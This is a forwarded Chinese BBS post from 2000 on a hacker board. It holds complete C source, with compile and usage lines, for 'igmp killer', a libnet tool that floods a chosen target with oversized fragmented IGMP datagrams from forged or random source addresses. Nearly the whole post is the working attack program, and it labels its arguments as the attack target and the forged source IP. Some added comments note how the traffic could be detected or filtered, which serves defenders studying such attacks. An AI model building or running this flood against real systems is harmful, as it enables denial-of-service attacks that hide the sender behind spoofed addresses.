发信人: bstone (Less time in bbs), 信区: Hacker
标 题: igmp killer one program for i386/Linux using libn
发信站: BBS 荔园晨风站 (Sun Aug 6 19:44:29 2000), 转信
发信人: scz (小四), 信区: Security
标 题: igmp killer one program for i386/Linux using libn
发信站: 武汉白云黄鹤站 (Fri Aug 4 14:38:18 2000), 站内信件
/*
* Compile: gcc -O3 -o igmpki igmpkilleri.c `libnet-config --defines --cflags` `libnet-config --libs`
* Usage : ./igmpki --si 192.168.10.3 --di 192.168.8.90 --num 200
* Date : 2000-08-03 22:57
*/
/*******************************************************************
* *
* 头文件 *
* *
*******************************************************************/
#define _GNU_SOURCE
#include
#include
#include /* 使用time()产生随机化种子 */
#include /* 使用getopt()长选项支持 */
#include /* 使用libnet必须包含这个头文件 */
/*******************************************************************
* *
* 宏定义 *
* *
*******************************************************************/
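/* Process exit / status codes. */
#define SUCCESS 0
/* Parenthesised so the negative value stays intact wherever it is expanded. */
#define FAILURE (-1)
/* Default number of IGMP datagrams to send when --num is not given. */
#define DEFAULTIGMPNUMBER 200
/*
 * Payload bytes carried by each full-size fragment (the original note calls
 * this the "abnormal payload length"). 1480 = 185 * 8, which matches the
 * fragment-offset step of 185 used in igmpSend().
 */
#define IPDATALEN 1480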
/*******************************************************************
* *
* 全局变量 *
* *
*******************************************************************/
/*
 * State table used to initialise the pseudo-random number generator.
 * main() hands it to initstate() with a state size of 128 and then to
 * setstate().
 */
u_long randomState[64] =
{
0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0,
0xab5c5918, 0x946554fd,
0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88,
0xe369735d, 0x904f35f7,
0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5,
0xf103bc02, 0x48f340fb,
0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b,
0x27fb47b9, 0x9a319039,
0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a,
0x8088e080, 0x02800004,
0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000,
0x94100003, 0xd60a0000,
0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffffa,
0x8600e007, 0x80a0e01f,
0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002,
0x81c3e008, 0xd4224000
};
/* Packet buffer; allocated in main() through Libnet_init_packet() and
 * written to by igmpSend(). */
u_char * packet = NULL;
/* Buffer size: one IP header plus one full-size fragment payload. */
size_t packet_size = LIBNET_IP_H + IPDATALEN;
/* Raw socket descriptor, opened in main() and used by igmpSend(). */
int rawSocket;
/*******************************************************************
* *
* 函数原型 *
* *
*******************************************************************/
/* Error-reporting wrapper around libnet_do_checksum(); not called anywhere
 * in the visible listing. */
void Libnet_do_checksum ( u_char * buf, int protocol, int len );
/* Error-reporting wrapper around libnet_init_packet(). */
void Libnet_init_packet ( size_t p_size, u_char ** buf );
/* Error-reporting wrapper around libnet_open_raw_sock(); returns the descriptor. */
int Libnet_open_raw_sock ( int protocol );
/* Wrapper around libnet_write_ip() that warns on a short write. */
void Libnet_write_ip ( int sock, u_char * packet, int len );
/* Emits one fragmented IP datagram (protocol IGMP) from srcIp to dstIp. */
void igmpSend ( u_long srcIp, u_long dstIp );
/* Prints the option summary to stderr and exits with FAILURE. */
void usage ( char * arg );
/*----------------------------------------------------------------------*/
/*
 * Run libnet_do_checksum() over `buf` for the given protocol and length.
 * A return of -1 is reported through libnet_error() at LIBNET_ERR_FATAL
 * severity (presumably terminating the process; confirm against the libnet
 * version in use). Nothing is returned to the caller.
 */
void Libnet_do_checksum ( u_char * buf, int protocol, int len )
{
    const int status = libnet_do_checksum( buf, protocol, len );

    if ( status != -1 )
    {
        return;
    }
    libnet_error( LIBNET_ERR_FATAL, "libnet_do_checksum failed\n" );
}
/*
 * Allocate a packet buffer of `p_size` bytes through libnet_init_packet(),
 * storing the pointer in `*buf`. A return of -1 is reported through
 * libnet_error() at LIBNET_ERR_FATAL severity (presumably terminating the
 * process; confirm against the libnet version in use).
 */
void Libnet_init_packet ( size_t p_size, u_char ** buf )
{
    const int status = libnet_init_packet( p_size, buf );

    if ( status != -1 )
    {
        return;
    }
    libnet_error( LIBNET_ERR_FATAL, "Can't initialize packet\n" );
}
/*
 * Open a raw socket for `protocol` through libnet_open_raw_sock() and return
 * its descriptor. A return of -1 is reported through libnet_error() at
 * LIBNET_ERR_FATAL severity, with the protocol number printed in hex; if that
 * call returns, the -1 is passed back to the caller unchanged.
 */
int Libnet_open_raw_sock ( int protocol )
{
    int fd = libnet_open_raw_sock( protocol );

    if ( fd == -1 )
    {
        libnet_error( LIBNET_ERR_FATAL, "Can't open raw socket %08x\n",
                      protocol );
    }
    return fd;
}
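/*
 * Send `len` bytes of `packet` on the raw socket `sock` via libnet_write_ip().
 * When the reported byte count is below `len` (a negative return lands here
 * too) a LIBNET_ERR_WARNING message is emitted. The outcome is reported only;
 * nothing is returned to the caller.
 */
void Libnet_write_ip ( int sock, u_char * packet, int len )
{
    int written = libnet_write_ip( sock, packet, len );

    if ( written < len )
    {
        /* The message literal was split across two lines in the posted
         * listing, which is not valid C; it is rejoined here. */
        libnet_error( LIBNET_ERR_WARNING,
                      "libnet_write_ip only wrote %d bytes\n", written );
    }
}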
/*
 * Emit one fragmented IP datagram (upper-layer protocol IGMP) from srcIp to
 * dstIp as 11 separate IP fragments written to the global rawSocket.
 *
 * What the traffic looks like on the wire, as far as this function shows
 * (useful for writing a detection rule or reading a capture):
 *   - every fragment carries the same IP ID (19774), TTL 255 and
 *     TOS IPTOS_LOWDELAY;
 *   - fragments are sent highest offset first: offset 1850 with the
 *     more-fragments bit clear and 200 data bytes, then offsets 1665, 1480,
 *     ... down to 0, each with the more-fragments bit (0x2000) set and
 *     IPDATALEN data bytes;
 *   - offsets are in 8-byte units, so the datagram reassembles to
 *     1850 * 8 + 200 = 15000 payload bytes;
 *   - no IGMP header is built here; only libnet_build_ip() is called, so the
 *     bytes after the IP header are whatever the packet buffer already holds.
 *
 * A reassembled IGMP datagram of this size is far larger than an IGMP message
 * needs, so dropping or rate-limiting fragmented IGMP at the network edge is
 * the usual control against this kind of traffic.
 *
 * Parameters: srcIp and dstIp are passed straight to libnet_build_ip(); the
 * original notes say they are in big-endian (network) byte order.
 */
void igmpSend ( u_long srcIp, u_long dstIp )
{
u_short ipDataLen;
u_short frag;
u_short bit;
bit = 0; /* first fragment sent has the more-fragments bit clear */
ipDataLen = 200; /* 200 bytes of payload here; 15000 bytes of payload in total */
frag = 1850; /* starting fragment offset, in 8-byte units */
do
{
/* Build the IP header */
libnet_build_ip( ipDataLen, /* length of the IP data area */
IPTOS_LOWDELAY, /* IP tos */
19774, /* IP ID */
frag | bit, /* frag stuff */
255, /* TTL */
IPPROTO_IGMP, /* upper-layer protocol */
srcIp, /* big-endian byte order */
dstIp, /* destination IP */
NULL, /* no options */
0, /* option length zero */
packet ); /* points at the IP header */
Libnet_write_ip( rawSocket, packet, LIBNET_IP_H + ipDataLen );
/* offset 0 has just been sent, so the sequence is complete */
if ( frag == 0 )
{
break;
}
ipDataLen = IPDATALEN;
bit = 0x2000; /* not the last fragment */
frag -= 185; /* 185 * 8 = 1480 bytes, i.e. one IPDATALEN step */
} while ( 1 ); /* 11 fragments are sent in total */
return;
} /* end of igmpSend */
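/*
 * Print the option summary to stderr, using `arg` as the program name, and
 * terminate the process with FAILURE. Does not return.
 */
void usage ( char * arg )
{
    /* The format literal was split across two lines in the posted listing,
     * which is not valid C; it is rejoined here. */
    fprintf( stderr,
             " Usage: %s [--si srcIp] [--di dstIp] [--num igmpNumber]\n",
             arg );
    exit( FAILURE );
}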
/*
 * Entry point: parse --si / --di / --num, then call igmpSend() igmpNumber
 * times over a raw socket opened with IPPROTO_RAW.
 *
 * Behaviour visible in this function:
 *   - with no arguments, or with -h / an unknown option, usage() is called;
 *   - --di is mandatory: dstIp left at 0xffffffff aborts with FAILURE;
 *   - when --si is not given, the source address is taken from random();
 *     this happens once, before the send loop, so every packet of one run
 *     carries the same source address;
 *   - --num of 0 (or text strtoul() turns into 0) aborts with FAILURE.
 *
 * Because the source address is caller-chosen or random, it says nothing
 * reliable about the sending host; egress/ingress source-address filtering
 * is the control that limits such forged traffic. Opening a raw socket
 * normally requires elevated privileges on the sending host.
 *
 * Returns SUCCESS after the loop and clean-up complete.
 */
int main ( int argc, char * argv[] )
{
#define LONGOPTIONCHAR '-'
/* Long-option table; every entry shares the same val, so the option is
 * identified by longOptionIndex below */
static struct option longOption[] =
{
{ "si", 1, 0, LONGOPTIONCHAR }, /* source IP */
{ "di", 1, 0, LONGOPTIONCHAR }, /* attack target IP */
{ "num", 1, 0, LONGOPTIONCHAR }, /* number of IGMP datagrams */
{ 0, 0, 0, 0 }
};
int longOptionIndex = 0; /* used when handling long options */
/* IP addresses are held in network byte order */
u_long srcIp = 0xffffffff; /* forged source IP */
u_long dstIp = 0xffffffff; /* destination IP */
u_long igmpNumber = DEFAULTIGMPNUMBER; /* number of IGMP datagrams */
unsigned int randomSeed = ( unsigned int )time( NULL );
int c, i;
if ( argc == 1 )
{
usage( argv[0] );
}
/* seed the generator from the current time, using the global state table */
initstate( randomSeed, ( char * )randomState, 128 );
setstate( ( char * )randomState );
opterr = 0; /* don't want getopt() writing to stderr */
while ( ( c = getopt_long( argc, argv, "h", longOption, &longOptionIndex )
) != EOF )
{
switch ( c )
{
case LONGOPTIONCHAR: /* handle a long option */
/*
fprintf( stderr, "option %s", longOption[ longOptionIndex ].name );
if ( optarg )
{
fprintf( stderr, " with arg %s", optarg );
}
fprintf( stderr, "\n" );
*/
if ( optarg )
{
switch ( longOptionIndex )
{
case 0:
/* the return value is in big-endian byte order */
srcIp = libnet_name_resolve( optarg, LIBNET_DONT_RESOLVE );
if ( srcIp == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "Bad srcIp: %s\n",
optarg );
}
break;
case 1:
/* the return value is in big-endian byte order */
dstIp = libnet_name_resolve( optarg, LIBNET_DONT_RESOLVE );
if ( dstIp == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "Bad dstIp: %s\n",
optarg );
}
break;
case 2: /* parsed as base 10 */
igmpNumber = ( u_long )strtoul( optarg, NULL, 10 );
if ( igmpNumber == 0 )
{
fprintf( stderr, "Check your igmpNumber\n" );
exit( FAILURE );
}
break;
default:
break;
} /* end of switch */
}
break;
case 'h':
case '?':
usage( argv[0] );
} /* end of switch */
} /* end of while */
/* dstIp still at its initial value means --di was never supplied */
if ( dstIp == 0xffffffff )
{
fprintf( stderr, "Check your dstIp\n" );
exit( FAILURE );
}
/* If srcIp was not specified, randomise it */
if ( srcIp == -1 )
{
srcIp = ( u_long )random();
}
fprintf( stderr, "[ Igmp sending ... ... ]\n" );
/* Allocate the packet memory and initialise it to zero */
Libnet_init_packet( packet_size, &packet );
/* Create the raw socket */
rawSocket = Libnet_open_raw_sock( IPPROTO_RAW );
for ( i = 0; i < igmpNumber; i++ )
{
igmpSend( srcIp, dstIp );
}
/* Close the raw socket */
libnet_close_raw_sock( rawSocket );
/* Free the memory allocated by libnet_init_packet() */
libnet_destroy_packet( &packet );
fprintf( stderr, "\n[ Igmp send finished ]\n" );
return( SUCCESS );
} /* end of main */
/*----------------------------------------------------------------------*/
--
也许有一天,他再从海上蓬蓬的雨点中升起,
飞向西来,再形成一道江流,再冲倒两旁的石壁,
再来寻夹岸的桃花。然而,我不敢说来生,也不敢信来生......
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: bbs.szptt.net.cn]
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.106]